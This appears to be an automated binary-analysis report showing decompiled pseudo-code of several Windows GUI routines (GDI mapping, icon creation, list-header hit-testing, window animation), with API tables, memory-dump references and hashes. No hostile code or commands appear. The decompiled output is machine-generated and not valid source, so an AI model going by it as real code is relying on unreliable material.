                                                                        			E0045DC38(void* __eax, void* __edx, void* __edi, void* __esi) {
				char _v12;
				int _v24;
				int _v28;
				signed int _v48;
				signed int _v52;
				int _t53;
				int _t55;
				signed int _t60;
				signed int _t63;
				int _t82;
				int _t84;
				signed int _t89;
				signed int _t92;
				void* _t97;
				void* _t113;

				_t97 = __eax;
				if(__edx == 0) {
					E00412BA4(0, _t113, 0, __edi, __esi);
					E00412BA4(1,  &_v12, 1, __edi, __esi);
					SetMapMode(E00420730( *((intOrPtr*)(_t97 + 0x208))), 8);
					SetWindowOrgEx(E00420730( *((intOrPtr*)(_t97 + 0x208))), _v28, _v24, 0);
					_t53 = E00435FF4(_t97);
					_t55 = E00435FB0(_t97);
					SetViewportExtEx(E00420730( *((intOrPtr*)(_t97 + 0x208))), _t55, _t53, 0);
					_t60 = E00435FF4(_t97);
					_t63 = E00435FB0(_t97);
					return SetWindowExtEx(E00420730( *((intOrPtr*)(_t97 + 0x208))), _t63 * _v52, _t60 * _v48, 0);
				}
				E00412BA4(E00412BA4(E00435FB0(__eax), _t113, 0, __edi, __esi) | 0xffffffff,  &_v12, 1, __edi, __esi);
				SetMapMode(E00420730( *((intOrPtr*)(_t97 + 0x208))), 8);
				SetWindowOrgEx(E00420730( *((intOrPtr*)(_t97 + 0x208))), _v28, _v24, 0);
				_t82 = E00435FF4(_t97);
				_t84 = E00435FB0(_t97);
				SetViewportExtEx(E00420730( *((intOrPtr*)(_t97 + 0x208))), _t84, _t82, 0);
				_t89 = E00435FF4(_t97);
				_t92 = E00435FB0(_t97);
				return SetWindowExtEx(E00420730( *((intOrPtr*)(_t97 + 0x208))), _t92 * _v52, _t89 * _v48, 0);
			}


















                                                                        0x0045dc3c
                                                                        0x0045dc40
                                                                        0x0045dcf0
                                                                        0x0045dd03
                                                                        0x0045dd16
                                                                        0x0045dd33
                                                                        0x0045dd3c
                                                                        0x0045dd44
                                                                        0x0045dd56
                                                                        0x0045dd5f
                                                                        0x0045dd6b
                                                                        0x00000000
                                                                        0x0045dd81
                                                                        0x0045dc62
                                                                        0x0045dc75
                                                                        0x0045dc92
                                                                        0x0045dc9b
                                                                        0x0045dca3
                                                                        0x0045dcb5
                                                                        0x0045dcbe
                                                                        0x0045dcca
                                                                        0x00000000

                                                                        APIs
                                                                        • SetMapMode.GDI32(00000000,00000008), ref: 0045DC75
                                                                        • SetWindowOrgEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045DC92
                                                                        • SetViewportExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045DCB5
                                                                        • SetWindowExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045DCE0
                                                                        • SetMapMode.GDI32(00000000,00000008), ref: 0045DD16
                                                                        • SetWindowOrgEx.GDI32(00000000,?,?,00000000), ref: 0045DD33
                                                                        • SetViewportExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045DD56
                                                                        • SetWindowExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045DD81
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Window$ModeViewport
                                                                        • String ID:
                                                                        • API String ID: 3149394475-0
                                                                        • Opcode ID: 72d5af6f7a7dd3e9eb6d3237a2dc3e9abd385e6a9d96b064c7a12b1895184f0e
                                                                        • Instruction ID: 8f84e7b93b444426f7dca1db73b7397be018fa4546cd3fd7a1a3ea71a0fadf7e
                                                                        • Opcode Fuzzy Hash: 72d5af6f7a7dd3e9eb6d3237a2dc3e9abd385e6a9d96b064c7a12b1895184f0e
                                                                        • Instruction Fuzzy Hash: B6313E707083006BD640FF7A8C96B4B629C9F44308F40593E7959DF297CA3DE8454769
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00421068, Relevance: 12.1, APIs: 8, Instructions: 79COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 26%
                                                                        			E00421068(void* __ebx) {
				intOrPtr _v8;
				char _v1000;
				char _v1004;
				char _v1032;
				signed int _v1034;
				short _v1036;
				void* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t45;
				intOrPtr _t52;
				void* _t54;
				void* _t55;

				_t54 = _t55;
				_v1036 = 0x300;
				_v1034 = 0x10;
				_t25 = E004029BC(_t24, 0x40,  &_v1032);
				_push(0);
				L00406EB4();
				_v8 = _t25;
				_push(_t54);
				_push(0x421165);
				_push( *[fs:eax]);
				 *[fs:eax] = _t55 + 0xfffffbf8;
				_push(0x68);
				_t27 = _v8;
				_push(_t27);
				L00406B8C();
				_t45 = _t27;
				if(_t45 >= 0x10) {
					_push( &_v1032);
					_push(8);
					_push(0);
					_push(_v8);
					L00406BCC();
					if(_v1004 != 0xc0c0c0) {
						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x424);
						_push(8);
						_push(_t45 - 8);
						_push(_v8);
						L00406BCC();
					} else {
						_push( &_v1004);
						_push(1);
						_push(_t45 - 8);
						_push(_v8);
						L00406BCC();
						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x420);
						_push(7);
						_push(_t45 - 7);
						_push(_v8);
						L00406BCC();
						_push( &_v1000);
						_push(1);
						_push(7);
						_push(_v8);
						L00406BCC();
					}
				}
				_pop(_t52);
				 *[fs:eax] = _t52;
				_push(E0042116C);
				_t29 = _v8;
				_push(_t29);
				_push(0);
				L00407124();
				return _t29;
			}

















                                                                        0x00421069
                                                                        0x00421072
                                                                        0x0042107b
                                                                        0x0042108f
                                                                        0x00421094
                                                                        0x00421096
                                                                        0x0042109b
                                                                        0x004210a0
                                                                        0x004210a1
                                                                        0x004210a6
                                                                        0x004210a9
                                                                        0x004210ac
                                                                        0x004210ae
                                                                        0x004210b1
                                                                        0x004210b2
                                                                        0x004210b7
                                                                        0x004210bc
                                                                        0x004210c8
                                                                        0x004210c9
                                                                        0x004210cb
                                                                        0x004210d0
                                                                        0x004210d1
                                                                        0x004210e0
                                                                        0x0042113c
                                                                        0x0042113d
                                                                        0x00421142
                                                                        0x00421146
                                                                        0x00421147
                                                                        0x004210e2
                                                                        0x004210e8
                                                                        0x004210e9
                                                                        0x004210f0
                                                                        0x004210f4
                                                                        0x004210f5
                                                                        0x00421108
                                                                        0x00421109
                                                                        0x0042110e
                                                                        0x00421112
                                                                        0x00421113
                                                                        0x0042111e
                                                                        0x0042111f
                                                                        0x00421121
                                                                        0x00421126
                                                                        0x00421127
                                                                        0x00421127
                                                                        0x004210e0
                                                                        0x0042114e
                                                                        0x00421151
                                                                        0x00421154
                                                                        0x00421159
                                                                        0x0042115c
                                                                        0x0042115d
                                                                        0x0042115f
                                                                        0x00421164

                                                                        APIs
                                                                        • 72E7AC50.USER32(00000000), ref: 00421096
                                                                        • 72E7AD70.GDI32(?,00000068,00000000,00421165,?,00000000), ref: 004210B2
                                                                        • 72E7AEF0.GDI32(?,00000000,00000008,?,?,00000068,00000000,00421165,?,00000000), ref: 004210D1
                                                                        • 72E7AEF0.GDI32(?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,00421165,?,00000000), ref: 004210F5
                                                                        • 72E7AEF0.GDI32(?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,00421165), ref: 00421113
                                                                        • 72E7AEF0.GDI32(?,00000007,00000001,?,?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?), ref: 00421127
                                                                        • 72E7AEF0.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,00421165,?,00000000), ref: 00421147
                                                                        • 72E7B380.USER32(00000000,?,0042116C,00421165,?,00000000), ref: 0042115F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: B380
                                                                        • String ID:
                                                                        • API String ID: 120756276-0
                                                                        • Opcode ID: dc843899b990a3085b2cec699ce40cc4c32d7f9abe66eaea43dc606af4fd6091
                                                                        • Instruction ID: f0e1a453716523f1c9eecebf53a0f2200f9152a329f4876d0861d21903a57afc
                                                                        • Opcode Fuzzy Hash: dc843899b990a3085b2cec699ce40cc4c32d7f9abe66eaea43dc606af4fd6091
                                                                        • Instruction Fuzzy Hash: 8B2183F5A00218AADB10DBA5CD85FAE77BCEB08704F5104A6F708F71C1D679AF548B28
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00421658, Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 86%
                                                                        			E00421658() {
				struct HINSTANCE__* _t145;
				long _t166;
				intOrPtr _t167;
				intOrPtr _t186;
				void* _t192;
				BYTE* _t193;
				BYTE* _t196;
				intOrPtr _t197;
				void* _t198;
				intOrPtr _t199;

				 *((intOrPtr*)(_t198 - 0x24)) = 0;
				 *((intOrPtr*)(_t198 - 0x20)) = E004214CC( *( *((intOrPtr*)(_t198 - 0x10)) + 2) & 0x0000ffff);
				_t192 =  *((intOrPtr*)(_t198 - 0xc)) - 1;
				if(_t192 > 0) {
					_t197 = 1;
					do {
						_t167 = E004214CC( *( *((intOrPtr*)(_t198 - 0x10)) + 2 + (_t197 + _t197) * 8) & 0x0000ffff);
						if(_t167 <=  *((intOrPtr*)(_t198 - 0x1c)) && _t167 >=  *((intOrPtr*)(_t198 - 0x20)) && E004214D8( *((intOrPtr*)(_t198 - 0x10)) + ( *((intOrPtr*)(_t198 - 0x24)) +  *((intOrPtr*)(_t198 - 0x24))) * 8,  *((intOrPtr*)(_t198 - 0x10)) + (_t197 + _t197) * 8, _t198) != 0) {
							 *((intOrPtr*)(_t198 - 0x24)) = _t197;
							 *((intOrPtr*)(_t198 - 0x20)) = _t167;
						}
						_t197 = _t197 + 1;
						_t192 = _t192 - 1;
						_t204 = _t192;
					} while (_t192 != 0);
				}
				 *(_t198 - 0x40) =  *((intOrPtr*)(_t198 - 0x10)) + ( *((intOrPtr*)(_t198 - 0x24)) +  *((intOrPtr*)(_t198 - 0x24))) * 8;
				 *( *(_t198 + 8)) =  *( *(_t198 - 0x40)) & 0x000000ff;
				( *(_t198 + 8))[1] = ( *(_t198 - 0x40))[1] & 0x000000ff;
				 *((intOrPtr*)(_t198 - 0x2c)) = E004083E8(( *(_t198 - 0x40))[8], _t204);
				 *[fs:eax] = _t199;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))) + 0x10))( *[fs:eax], 0x42183f, _t198);
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))) + 8))();
				E00421310( *((intOrPtr*)(_t198 - 0x2c)),  *((intOrPtr*)(_t198 - 0x2c)), _t198 - 0x38, _t198 - 0x34, _t192,  *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))), _t204,  *(_t198 + 8));
				GetObjectA( *(_t198 - 0x38), 0x18, _t198 - 0x70);
				GetObjectA( *(_t198 - 0x34), 0x18, _t198 - 0x58);
				_t166 =  *(_t198 - 0x64) *  *(_t198 - 0x68) * ( *(_t198 - 0x60) & 0x0000ffff);
				 *(_t198 - 0x3c) =  *(_t198 - 0x4c) *  *(_t198 - 0x50) * ( *(_t198 - 0x48) & 0x0000ffff);
				 *((intOrPtr*)(_t198 - 0x18)) =  *(_t198 - 0x3c) + _t166;
				 *(_t198 - 0x30) = E004083E8( *((intOrPtr*)(_t198 - 0x18)), _t204);
				_push(_t198);
				_push(0x42181c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t199;
				_t193 =  *(_t198 - 0x30);
				_t196 =  &(( *(_t198 - 0x30))[_t166]);
				GetBitmapBits( *(_t198 - 0x38), _t166, _t193);
				GetBitmapBits( *(_t198 - 0x34),  *(_t198 - 0x3c), _t196);
				DeleteObject( *(_t198 - 0x34));
				DeleteObject( *(_t198 - 0x38));
				_t145 =  *0x496714; // 0x400000
				 *((intOrPtr*)( *((intOrPtr*)(_t198 - 8)))) = CreateIcon(_t145,  *( *(_t198 + 8)), ( *(_t198 + 8))[1],  *(_t198 - 0x48),  *(_t198 - 0x46), _t193, _t196);
				if( *((intOrPtr*)( *((intOrPtr*)(_t198 - 8)))) == 0) {
					E00420A80(_t166);
				}
				_pop(_t186);
				 *[fs:eax] = _t186;
				_push(E00421823);
				return E00402774( *(_t198 - 0x30));
			}













                                                                        0x0042165a
                                                                        0x00421669
                                                                        0x0042166f
                                                                        0x00421672
                                                                        0x00421674
                                                                        0x00421679
                                                                        0x0042168a
                                                                        0x0042168f
                                                                        0x004216b6
                                                                        0x004216b9
                                                                        0x004216b9
                                                                        0x004216bc
                                                                        0x004216bd
                                                                        0x004216bd
                                                                        0x004216bd
                                                                        0x00421679
                                                                        0x004216cb
                                                                        0x004216d7
                                                                        0x004216e3
                                                                        0x004216f1
                                                                        0x004216ff
                                                                        0x00421719
                                                                        0x0042172c
                                                                        0x0042173b
                                                                        0x0042174a
                                                                        0x00421759
                                                                        0x00421769
                                                                        0x00421778
                                                                        0x00421780
                                                                        0x0042178b
                                                                        0x00421790
                                                                        0x00421791
                                                                        0x00421796
                                                                        0x00421799
                                                                        0x0042179c
                                                                        0x004217a2
                                                                        0x004217aa
                                                                        0x004217b8
                                                                        0x004217c1
                                                                        0x004217ca
                                                                        0x004217e6
                                                                        0x004217f4
                                                                        0x004217fc
                                                                        0x004217fe
                                                                        0x004217fe
                                                                        0x00421805
                                                                        0x00421808
                                                                        0x0042180b
                                                                        0x0042181b

                                                                        APIs
                                                                        • GetObjectA.GDI32(?,00000018,?), ref: 0042174A
                                                                        • GetObjectA.GDI32(?,00000018,?), ref: 00421759
                                                                        • GetBitmapBits.GDI32(?,?,?), ref: 004217AA
                                                                        • GetBitmapBits.GDI32(?,?,?), ref: 004217B8
                                                                        • DeleteObject.GDI32(?), ref: 004217C1
                                                                        • DeleteObject.GDI32(?), ref: 004217CA
                                                                        • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 004217EC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                        • String ID:
                                                                        • API String ID: 1030595962-0
                                                                        • Opcode ID: 0836e0556076b5f12d1ae0eb89dd1a5762be714dfc8aaf9dfb912e760cb5b2e7
                                                                        • Instruction ID: 013013fe9648ae5886e4b8230851134a27cb4e01da0e6262b179e60b3c39ad5f
                                                                        • Opcode Fuzzy Hash: 0836e0556076b5f12d1ae0eb89dd1a5762be714dfc8aaf9dfb912e760cb5b2e7
                                                                        • Instruction Fuzzy Hash: ED611875A00229AFCB00EFA9D881E9EBBF9FF48304B554466F804EB361D734AD51CB64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00475338, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 163windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 86%
                                                                        			E00475338(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v28;
				void* _v32;
				struct tagPOINT _v40;
				void* _t55;
				void* _t56;
				signed char _t60;
				struct HWND__* _t61;
				void* _t64;
				void* _t66;
				struct HWND__* _t73;
				signed short _t80;
				void* _t89;
				int _t93;
				long _t106;
				intOrPtr* _t112;
				intOrPtr _t123;
				intOrPtr _t124;
				void* _t132;
				signed char* _t141;
				void* _t144;
				void* _t145;
				struct HWND__* _t148;
				void* _t152;

				_v16 = 0;
				_t144 = __edx;
				_t112 = __eax;
				_push(_t152);
				_push(0x475537);
				_push( *[fs:eax]);
				 *[fs:eax] = _t152 + 0xffffffdc;
				E0043AFDC(__eax, 0, __edx, __eflags);
				if(E00475568(_t112) == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t144 + 8)))) !=  *((intOrPtr*)(_t112 + 0x264))) {
					L22:
					_pop(_t123);
					 *[fs:eax] = _t123;
					_push(0x47553e);
					return E00404348( &_v16);
				} else {
					_t124 =  *((intOrPtr*)(_t144 + 8));
					_t55 =  *((intOrPtr*)(_t124 + 8)) - 0xfffffec9;
					if(_t55 == 0) {
						 *((char*)(_t112 + 0x295)) = 1;
						goto L22;
					}
					_t56 = _t55 - 4;
					if(_t56 == 0) {
						_t57 = _t124;
						_t141 =  *(_t124 + 0x14);
						__eflags =  *_t141 & 0x00000001;
						if(( *_t141 & 0x00000001) != 0) {
							_t145 = E00477D88(_t112,  *((intOrPtr*)(_t57 + 0xc)));
							_t60 =  *(_t145 + 0x18);
							__eflags = _t60 - _t141[4];
							if(_t60 < _t141[4]) {
								_t61 =  *(_t145 + 0x14);
								__eflags = _t61;
								if(_t61 > 0) {
									__eflags = _t61 - _t141[4];
									if(_t61 <= _t141[4]) {
										_t141[4] = _t61;
									}
								}
							} else {
								_t141[4] = _t60;
							}
							E00472AA4(_t145, _t141[4]);
						}
					} else {
						_t64 = _t56 - 2;
						if(_t64 == 0) {
							_t66 = E00477D88(_t112,  *((intOrPtr*)(_t124 + 0xc)));
							E00472AA4(_t66, E00426D20(E0043CC2C(_t112),  *((intOrPtr*)(_t124 + 0xc))));
							_t73 =  *((intOrPtr*)( *_t112 + 0x120))();
							__eflags = _t73;
							if(_t73 != 0) {
								 *((intOrPtr*)( *_t112 + 0x7c))();
							}
						} else {
							if(_t64 == 0x12c) {
								_push(E004072A4(GetMessagePos()) & 0x0000ffff);
								_t80 = GetMessagePos();
								_pop(_t132);
								E004067C4(_t80 & 0x0000ffff,  &_v12, _t132);
								E004360F0(_t112,  &_v40,  &_v12);
								_push(_v40.y);
								_t148 = ChildWindowFromPoint(E0043CC2C(_t112), _v40.x);
								__eflags = _t148;
								if(_t148 != 0) {
									_t89 = E0043CC2C(_t112);
									__eflags = _t148 - _t89;
									if(_t148 != _t89) {
										E00404984( &_v16, 0x50);
										_t93 = E00404600(_v16);
										E00404984( &_v16, GetClassNameA(_t148, E004047F8(_v16), _t93));
										E00404744(_v16, "SysHeader32");
										if(__eflags == 0) {
											E004360F0(_t112,  &_v40,  &_v12);
											_v32 = _v40;
											_v28 = _v40.y;
											_t106 = SendMessageA(_t148, 0x1206, 1,  &_v32);
											__eflags = _t106;
											if(_t106 >= 0) {
												E00477D88(_t112, _v20);
												E004037D8(_t112, __eflags);
											}
										}
									}
								}
							}
						}
					}
					goto L22;
				}
			}





























                                                                        0x00475343
                                                                        0x00475346
                                                                        0x00475348
                                                                        0x0047534c
                                                                        0x0047534d
                                                                        0x00475352
                                                                        0x00475355
                                                                        0x0047535c
                                                                        0x0047536a
                                                                        0x00475521
                                                                        0x00475523
                                                                        0x00475526
                                                                        0x00475529
                                                                        0x00475536
                                                                        0x00475381
                                                                        0x00475381
                                                                        0x00475389
                                                                        0x0047538e
                                                                        0x004753ef
                                                                        0x00000000
                                                                        0x004753ef
                                                                        0x00475390
                                                                        0x00475393
                                                                        0x004753aa
                                                                        0x004753ac
                                                                        0x004753af
                                                                        0x004753b2
                                                                        0x004753c2
                                                                        0x004753c4
                                                                        0x004753c7
                                                                        0x004753ca
                                                                        0x004753d1
                                                                        0x004753d4
                                                                        0x004753d6
                                                                        0x004753d8
                                                                        0x004753db
                                                                        0x004753dd
                                                                        0x004753dd
                                                                        0x004753db
                                                                        0x004753cc
                                                                        0x004753cc
                                                                        0x004753cc
                                                                        0x004753e5
                                                                        0x004753e5
                                                                        0x00475395
                                                                        0x00475395
                                                                        0x00475398
                                                                        0x00475402
                                                                        0x0047541c
                                                                        0x00475429
                                                                        0x0047542f
                                                                        0x00475431
                                                                        0x0047543b
                                                                        0x0047543b
                                                                        0x0047539a
                                                                        0x0047539f
                                                                        0x00475450
                                                                        0x00475451
                                                                        0x0047545c
                                                                        0x0047545d
                                                                        0x0047546a
                                                                        0x0047546f
                                                                        0x00475482
                                                                        0x00475484
                                                                        0x00475486
                                                                        0x0047548e
                                                                        0x00475493
                                                                        0x00475495
                                                                        0x004754a3
                                                                        0x004754ab
                                                                        0x004754c5
                                                                        0x004754d2
                                                                        0x004754d7
                                                                        0x004754e1
                                                                        0x004754e9
                                                                        0x004754ef
                                                                        0x004754fe
                                                                        0x00475503
                                                                        0x00475505
                                                                        0x0047550c
                                                                        0x0047551c
                                                                        0x0047551c
                                                                        0x00475505
                                                                        0x004754d7
                                                                        0x00475495
                                                                        0x00475486
                                                                        0x0047539f
                                                                        0x00475398
                                                                        0x00000000
                                                                        0x00475393

                                                                        APIs
                                                                        • GetMessagePos.USER32 ref: 00475443
                                                                        • GetMessagePos.USER32 ref: 00475451
                                                                        • ChildWindowFromPoint.USER32 ref: 0047547D
                                                                        • GetClassNameA.USER32(00000000,00000000,00000000), ref: 004754BB
                                                                        • SendMessageA.USER32 ref: 004754FE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Message$ChildClassFromNamePointSendWindow
                                                                        • String ID: SysHeader32
                                                                        • API String ID: 2510305242-2725536604
                                                                        • Opcode ID: d034041ecabf4923f7cfd097c591cd5564faaec20f246c75c438c683bcdc8265
                                                                        • Instruction ID: 9da0523838ad94a5aacdfd7dfe65334668b87c58a187b1523fb11523a5177e66
                                                                        • Opcode Fuzzy Hash: d034041ecabf4923f7cfd097c591cd5564faaec20f246c75c438c683bcdc8265
                                                                        • Instruction Fuzzy Hash: FA517F70B009056BCB10EF79D9819EEB3E5AF48304B50C17AB819EB356DB7CED058798
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0043E178, Relevance: 10.7, APIs: 7, Instructions: 151COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 67%
                                                                        			E0043E178(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				void _v12;
				intOrPtr _v16;
				int _v24;
				int _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _t85;
				void* _t113;
				intOrPtr _t129;
				intOrPtr _t138;
				void* _t141;

				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t113 = __ecx;
				_v8 = __eax;
				_t138 =  *0x495c2c; // 0x496c08
				 *((char*)(_v8 + 0x210)) = 1;
				_push(_t141);
				_push(0x43e33f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t141 + 0xffffffe0;
				E004365DC(_v8, __ecx, __ecx, _t138);
				_v16 = _v16 + 4;
				E00437804(_v8,  &_v28);
				if(E004541C8() <  *(_v8 + 0x4c) + _v24) {
					_v24 = E004541C8() -  *(_v8 + 0x4c);
				}
				if(E004541D4() <  *(_v8 + 0x48) + _v28) {
					_v28 = E004541D4() -  *(_v8 + 0x48);
				}
				if(E004541BC() > _v28) {
					_v28 = E004541BC();
				}
				if(E004541B0() > _v16) {
					_v16 = E004541B0();
				}
				SetWindowPos(E0043CC2C(_v8), 0xffffffff, _v28, _v24,  *(_v8 + 0x48),  *(_v8 + 0x4c), 0x10);
				if(GetTickCount() -  *((intOrPtr*)(_v8 + 0x214)) > 0xfa && E00404600(_t113) < 0x64 &&  *0x47a8a8 != 0) {
					SystemParametersInfoA(0x1016, 0,  &_v12, 0);
					if(_v12 != 0) {
						SystemParametersInfoA(0x1018, 0,  &_v12, 0);
						if(_v12 == 0) {
							E004413CC( &_v36);
							if(_v32 <= _v24) {
							}
						}
						 *0x47a8a8(E0043CC2C(_v8), 0x64,  *0x0047A9B0 | 0x00040000);
					}
				}
				ShowWindow(E0043CC2C(_v8), 4);
				 *((intOrPtr*)( *_v8 + 0x7c))();
				_pop(_t129);
				 *[fs:eax] = _t129;
				_push(0x43e346);
				 *((intOrPtr*)(_v8 + 0x214)) = GetTickCount();
				_t85 = _v8;
				 *((char*)(_t85 + 0x210)) = 0;
				return _t85;
			}















                                                                        0x0043e186
                                                                        0x0043e187
                                                                        0x0043e188
                                                                        0x0043e189
                                                                        0x0043e18a
                                                                        0x0043e18c
                                                                        0x0043e18f
                                                                        0x0043e198
                                                                        0x0043e1a1
                                                                        0x0043e1a2
                                                                        0x0043e1a7
                                                                        0x0043e1aa
                                                                        0x0043e1b2
                                                                        0x0043e1b7
                                                                        0x0043e1c1
                                                                        0x0043e1d8
                                                                        0x0043e1e7
                                                                        0x0043e1e7
                                                                        0x0043e1fc
                                                                        0x0043e20b
                                                                        0x0043e20b
                                                                        0x0043e218
                                                                        0x0043e221
                                                                        0x0043e221
                                                                        0x0043e22e
                                                                        0x0043e237
                                                                        0x0043e237
                                                                        0x0043e25d
                                                                        0x0043e275
                                                                        0x0043e29d
                                                                        0x0043e2a6
                                                                        0x0043e2b5
                                                                        0x0043e2be
                                                                        0x0043e2cc
                                                                        0x0043e2d7
                                                                        0x0043e2d7
                                                                        0x0043e2d7
                                                                        0x0043e2fb
                                                                        0x0043e2fb
                                                                        0x0043e2a6
                                                                        0x0043e30c
                                                                        0x0043e316
                                                                        0x0043e31b
                                                                        0x0043e31e
                                                                        0x0043e321
                                                                        0x0043e32e
                                                                        0x0043e334
                                                                        0x0043e337
                                                                        0x0043e33e

                                                                        APIs
                                                                        • SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,0043E33F), ref: 0043E25D
                                                                        • GetTickCount.KERNEL32 ref: 0043E262
                                                                        • SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 0043E29D
                                                                        • SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 0043E2B5
                                                                        • AnimateWindow.USER32(00000000,00000064,00000001), ref: 0043E2FB
                                                                        • ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,0043E33F), ref: 0043E30C
                                                                        • GetTickCount.KERNEL32 ref: 0043E326
                                                                          • Part of subcall function 004413CC: GetCursorPos.USER32(?), ref: 004413D0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
                                                                        • String ID:
                                                                        • API String ID: 3024527889-0
                                                                        • Opcode ID: f4f60809fc3c55fa7bfb8adf48c85d06a3e4bd1bd40411fcc5e6a40c3df89d3b
                                                                        • Instruction ID: 7261888abba92b40dc426993c3f0a1dc2aaa4b26281b0a3ad08c4c814d8d1b3d
                                                                        • Opcode Fuzzy Hash: f4f60809fc3c55fa7bfb8adf48c85d06a3e4bd1bd40411fcc5e6a40c3df89d3b
                                                                        • Instruction Fuzzy Hash: 9D516474A00105EFDB10EFA9C985A9EB7F5EF49304F2045AAF500EB391D775AE80CB59
                                                                        Uniqueness

